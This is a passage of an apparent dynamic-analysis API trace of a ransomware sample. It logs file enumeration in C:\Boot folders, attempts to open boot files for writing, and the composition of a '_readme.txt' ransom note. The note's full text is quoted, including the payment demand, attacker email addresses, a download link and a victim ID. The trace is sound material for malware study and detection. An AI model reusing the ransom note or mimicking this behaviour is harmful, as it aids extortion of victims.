ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.663] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.663] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.663] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0201.663] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.664] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.664] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.664] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.664] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.665] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0201.666] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.666] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.666] PathFindFileNameW (pszPath="") returned="" [0201.666] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.666] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.666] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.666] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.666] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0201.666] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0201.666] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.667] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.667] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.667] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.667] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.667] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.667] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0201.667] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.668] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.668] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.668] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.668] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 